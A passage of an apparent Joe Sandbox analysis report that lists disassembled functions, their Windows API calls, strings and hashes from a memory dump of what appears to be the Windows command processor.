                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$DriveInformationTypeVolume
                                                                            • String ID:
                                                                            • API String ID: 285405857-0
                                                                            • Opcode ID: a05e663bcf6ea8c426ef58d577f139b3342fc96cc4423024f40466efeb28470f
                                                                            • Instruction ID: 0ec9971a3926fc4b1874dd5b2f85f5d7281a6f1325f1fc729da44ed068261620
                                                                            • Opcode Fuzzy Hash: a05e663bcf6ea8c426ef58d577f139b3342fc96cc4423024f40466efeb28470f
                                                                            • Instruction Fuzzy Hash: B5314371910219ABDF24DBA5DC99AEF7BF8FF49344F040499E415E3190EB34DA84CB25
                                                                            Function 00B0998D Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B09A11: _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                              • Part of subcall function 00B09A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                              • Part of subcall function 00B09A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                              • Part of subcall function 00B09A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                              • Part of subcall function 00B09A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                              • Part of subcall function 00B09A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,00B40AF0,00000002,?,?,00B1A669,%s %s ,?,?,00000000), ref: 00B099DC
                                                                            • _get_osfhandle.MSVCRT ref: 00B099EC
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00B1A669,%s %s ,?,?,00000000), ref: 00B099F4
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B09A09
                                                                              • Part of subcall function 00B09B3B: _get_osfhandle.MSVCRT ref: 00B09B4E
                                                                              • Part of subcall function 00B09B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,000000FF,00B3A7F0,00002000,00000000,00000000), ref: 00B09B8E
                                                                              • Part of subcall function 00B09B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,-00000001,?,00000000), ref: 00B09BA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                            • String ID:
                                                                            • API String ID: 4057327938-0
                                                                            • Opcode ID: f864e3f0a67762f39412f018e27397ebbf67ef3051f6a10842dd41942d59fde7
                                                                            • Instruction ID: f1f0a5d6b0fb76da6096b6f3d11d150cebf97cf23bd4e3776165d91c9f68dd8d
                                                                            • Opcode Fuzzy Hash: f864e3f0a67762f39412f018e27397ebbf67ef3051f6a10842dd41942d59fde7
                                                                            • Instruction Fuzzy Hash: 41213D327C4315ABE7246BB55CCAB6E6ADCEB45B55F1000BEF607C71C2EEA0CD009161
                                                                            Function 00B09B3B Relevance: 9.1, APIs: 6, Instructions: 88fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B09B4E
                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,000000FF,00B3A7F0,00002000,00000000,00000000), ref: 00B09B8E
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,-00000001,?,00000000), ref: 00B09BA3
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B40AF0,?,?,00000000), ref: 00B1C0BC
                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,00001000,00B3A7F0,00002000,00000000,00000000,00B40AEE), ref: 00B1C0DC
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,00000000,?,00000000), ref: 00B1C0FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 3249344982-0
                                                                            • Opcode ID: 8d7c815e2ef5c4b062cba3593801c2fad4d3cc4d9a5c3336afca5e55b9cc589a
                                                                            • Instruction ID: 3e1ba726f4e5862964887e5f51f692295b83f7e043cadd3a9c672ebad79c3afb
                                                                            • Opcode Fuzzy Hash: 8d7c815e2ef5c4b062cba3593801c2fad4d3cc4d9a5c3336afca5e55b9cc589a
                                                                            • Instruction Fuzzy Hash: 7A219DB6680201FFEB205B64AC89F6A7BBDEB05760F2040A5F941E32D0DAB09E40C665
                                                                            Function 00B27540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • _wcsicmp.MSVCRT ref: 00B275AC
                                                                            • _wcsicmp.MSVCRT ref: 00B275CB
                                                                            • _wcsicmp.MSVCRT ref: 00B275F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpwcschr$iswspace
                                                                            • String ID: KEYS$LIST$OFF
                                                                            • API String ID: 3924973218-4129271751
                                                                            • Opcode ID: bfcfcb6427cf37f6d8de145d93a9dede7a20bc2cf3422db2027b413dac5bcf23
                                                                            • Instruction ID: ce37ff64376713bf6e5e1b8227413257e64096e22f91ee13d76ca99c8014f3bc
                                                                            • Opcode Fuzzy Hash: bfcfcb6427cf37f6d8de145d93a9dede7a20bc2cf3422db2027b413dac5bcf23
                                                                            • Instruction Fuzzy Hash: C1118C326CC7219BE3295719BC9AC7BBBDCFBE5720374409EF50A861C0EE615B01815D
                                                                            Function 00B0DD98 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B0DDD6
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000001), ref: 00B0DDE5
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B0DDF0
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B0DDF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 513048808-0
                                                                            • Opcode ID: 15c14515a10c50d5a46d26432d87a05ea55dfee410055dddc1d8cc3b050cb946
                                                                            • Instruction ID: 8bd25eb6199101c0c9edb0d0c6df8044ba70b123503aac368ac8f709e7f36466
                                                                            • Opcode Fuzzy Hash: 15c14515a10c50d5a46d26432d87a05ea55dfee410055dddc1d8cc3b050cb946
                                                                            • Instruction Fuzzy Hash: 7F11E333804255ABDB114BE8DD8D77A3FE8E747368F6443A5E821930E0DE758E019692
                                                                            Function 00B09A11 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 513048808-0
                                                                            • Opcode ID: 0da9540de470da4f6e77ab2871c4d783b6d56520438dfbe58e6a2e2e60d9deaf
                                                                            • Instruction ID: b59330109050ec134fd8b88d588afeb8537f0f63a162333d29261f7acf76feb6
                                                                            • Opcode Fuzzy Hash: 0da9540de470da4f6e77ab2871c4d783b6d56520438dfbe58e6a2e2e60d9deaf
                                                                            • Instruction Fuzzy Hash: 2801D637A040206BD62147789C8D97B7EECE787734B250365F836E31D1DE708E0191A2
                                                                            Function 00B0DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • memset.MSVCRT ref: 00B1D954
                                                                            • longjmp.MSVCRT(00B40A70,000000FF,00000000,00B325C2,00B325C0,?,?,?,?,00B0D980), ref: 00B1D96D
                                                                            • memcpy.MSVCRT(?,00000000,00002000,00000000,00B325C2,00B325C0,?,?,?,?,00B0D980), ref: 00B1D987
                                                                            • longjmp.MSVCRT(00B40A70,000000FF,00B325C2,00B325C0,?,?,?,?,00B0D980), ref: 00B1D9D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                            • String ID: 0123456789
                                                                            • API String ID: 2034586978-2793719750
                                                                            • Opcode ID: bc5d723bc27242ee9536dee1fded55b0e03e01df42215ab17889bfc7bc1acec3
                                                                            • Instruction ID: 094dbacacc9a9fe9cbd00367596c279129ba1497fd23939387b52add4f47c38d
                                                                            • Opcode Fuzzy Hash: bc5d723bc27242ee9536dee1fded55b0e03e01df42215ab17889bfc7bc1acec3
                                                                            • Instruction Fuzzy Hash: 83710735B002069BDB249FA8CC8576E7BF1EB90700F6980E9E945973D4EB719E46CB90
                                                                            Function 00B05020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B05074
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00B0515F
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • iswspace.MSVCRT ref: 00B19289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspacememset
                                                                            • String ID: %s
                                                                            • API String ID: 2220997661-3043279178
                                                                            • Opcode ID: 9d2bebfb233293499a6f1ff689d0fcd71fb520ddcadd6e9ca0a307ec74fb4e7b
                                                                            • Instruction ID: a808adbc9178bb43c710435d8c559ff17d45b3f42b57815d52c4c4966d7ca974
                                                                            • Opcode Fuzzy Hash: 9d2bebfb233293499a6f1ff689d0fcd71fb520ddcadd6e9ca0a307ec74fb4e7b
                                                                            • Instruction Fuzzy Hash: 6051D375A00216ABDB24DF6498566BFB7F5FF58310F5440EDE846E7280EB309E81CB94
                                                                            Function 00B270D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00B27121
                                                                            • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00B27197
                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00B271FF
                                                                            Strings
                                                                            • %WINDOWS_COPYRIGHT%, xrefs: 00B27107
                                                                            • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 00B270EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                            • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                            • API String ID: 1103618819-4062316587
                                                                            • Opcode ID: ffc56e93f66e205046e713a8095a7683ec60dfc9056da655f52b294bc8ff64a5
                                                                            • Instruction ID: 939ef70f59f045aa041bb5fb5d8b4056074d65dc82f90e86a7a6b09a71acd671
                                                                            • Opcode Fuzzy Hash: ffc56e93f66e205046e713a8095a7683ec60dfc9056da655f52b294bc8ff64a5
                                                                            • Instruction Fuzzy Hash: 6C410835B4022587CB20CF68A8917BA73F5FF49701F6800A9E949FB350EE659E43C395
                                                                            Function 00B22584 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00B22652
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B22670
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B22694
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateSemaphore
                                                                            • String ID: _p0$wil
                                                                            • API String ID: 4049970386-1814513734
                                                                            • Opcode ID: d85a5d550143ab7c403726e94698b21c0392be7749bcc25744b46af3ccc3d69e
                                                                            • Instruction ID: 39599fd3e8c1ca4a93f9ee22e25e3ab9ff7c44ef829456b405905ce60f79cd70
                                                                            • Opcode Fuzzy Hash: d85a5d550143ab7c403726e94698b21c0392be7749bcc25744b46af3ccc3d69e
                                                                            • Instruction Fuzzy Hash: 9731E876B401299BCB26DF24ED99AAA73F5FF94310F1441E8E809C7250DE70DE40CB60
                                                                            Function 00B251E8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsnicmp.MSVCRT ref: 00B25295
                                                                              • Part of subcall function 00B1727B: __iob_func.MSVCRT ref: 00B17280
                                                                            • fprintf.MSVCRT ref: 00B25215
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: __iob_func_wcsnicmpfprintf
                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                            • API String ID: 1828771275-2781220306
                                                                            • Opcode ID: fb1ac51f40d7bdab39718fac37d354788b7dc1e556c1cf851bdd56c879f761dd
                                                                            • Instruction ID: 773b5a3b71c9bde0f0b51c7306b790146f29db315b0364f31f8135e34ab1d7e7
                                                                            • Opcode Fuzzy Hash: fb1ac51f40d7bdab39718fac37d354788b7dc1e556c1cf851bdd56c879f761dd
                                                                            • Instruction Fuzzy Hash: 64314F36E00621DBCB38AB68AC45AAEB7E1EF54700F1444EDEC0EA32C1EA705E41C655
                                                                            Function 00B0B3C1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0AB7F: iswspace.MSVCRT ref: 00B0AB8D
                                                                              • Part of subcall function 00B0AB7F: wcschr.MSVCRT ref: 00B0AB9E
                                                                            • wcschr.MSVCRT ref: 00B0B3FC
                                                                            • wcschr.MSVCRT ref: 00B0B40E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace
                                                                            • String ID: &<|>$+: $=,;
                                                                            • API String ID: 3458554142-2256444845
                                                                            • Opcode ID: cdfd81b308a11888facda076c31104656ca0518a66ffe768d1acb17ab612641f
                                                                            • Instruction ID: a0195a0dd60297bc045eeb6858fd71d818d1069e56641367d3dba451909bac22
                                                                            • Opcode Fuzzy Hash: cdfd81b308a11888facda076c31104656ca0518a66ffe768d1acb17ab612641f
                                                                            • Instruction Fuzzy Hash: 2A113632A00125A6C7349F268455DBEBFE6EFA2750B2840EAE8C1973C1F7719E40D315
                                                                            Function 00B04D42 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00B04D66
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00B04D8A
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B04D95
                                                                            Strings
                                                                            • UBR, xrefs: 00B04D82
                                                                            • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00B04D5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                            • API String ID: 3677997916-3870813718
                                                                            • Opcode ID: 9dc8f92e450166bdf569413f92ac62cdbba680b8dc9f9ced92400f2014cb9c02
                                                                            • Instruction ID: 3eaf29d23a349b6ae547be1a3b01d85c2021b77dc39ed32e0eb5cb9318b4b47e
                                                                            • Opcode Fuzzy Hash: 9dc8f92e450166bdf569413f92ac62cdbba680b8dc9f9ced92400f2014cb9c02
                                                                            • Instruction Fuzzy Hash: 5F011DB6A40218BBDB219B94DC45FDEBBFCEB84750F1005A6FA01A2190D770AE15DA50
                                                                            Function 00B0FCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B0FD3A
                                                                            • wcsspn.MSVCRT ref: 00B0FF18
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00B12229,00000000,-00000105,?,00000000,00000000), ref: 00B1000F
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D3A
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D44
                                                                              • Part of subcall function 00B11CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D57
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D61
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
